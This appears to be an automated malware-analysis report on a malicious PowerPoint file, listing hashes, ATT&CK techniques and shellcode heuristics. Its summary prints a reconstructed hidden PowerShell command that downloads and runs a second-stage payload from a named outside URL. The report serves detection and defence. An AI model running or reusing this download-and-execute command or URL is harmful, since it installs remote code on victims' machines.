Office (OLE) / .PPT malware analysis — malicious · 7bcbeaafff97710a

MALICIOUS

Office (OLE) / .PPT

616.5 KB Created: 1601-01-01 00:00:00 Authoring application: Microsoft PowerPoint

MD5: e3cac2f79f900f03e4b31e5f4f389dfa SHA-1: aba7a149af92046462e1ee2dca4f03878d1dca02 SHA-256: 7bcbeaafff97710adcba63a41c460392f7ecd427327916d06a4bc40989369a46

302 Risk Score

Malware Insights

MITRE ATT&CK

T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample is a PowerPoint file containing heuristics indicating API hashing, PEB access, and a reference to the URLDownloadToFile API. It also contains a suspicious invocation of cmd.exe with a PowerShell execution flag, likely to download and execute a second-stage payload from the embedded URL http://bmwftp.blogdns.net:8080/nnn/. The reconstructed command line is cmd.exe /c "powershell -nop -w hidden -c \"IEX(New-Object Net.WebClient).DownloadString('http://bmwftp.blogdns.net:8080/nnn/')\"".

Heuristics 8

Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD

Reference to URLDownloadToFile API
x86 GetPC stub (CALL $+5; POP EAX) high SC_GETPC_CALL

x86 GetPC stub (CALL $+5; POP EAX)
PEB access via FS segment (x86) high SC_PEB_ACCESS

PEB access via FS segment (x86)
PEB API-hash resolver high SC_API_HASH_RESOLVER

PEB access followed by ROR13-style API hashing, a common position-independent shellcode import resolver
Suspicious cmd.exe invocation with execution flag high SC_STR_CMD

Suspicious cmd.exe invocation with execution flag
Reference to LoadLibrary API high SC_STR_LOADLIBRARY

Reference to LoadLibrary API
Reference to GetProcAddress API high SC_STR_GETPROCADDRESS

Reference to GetProcAddress API
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://bmwftp.blogdns.net:8080/nnn/#

Open this report in the interactive analyzer, or submit your own file for analysis.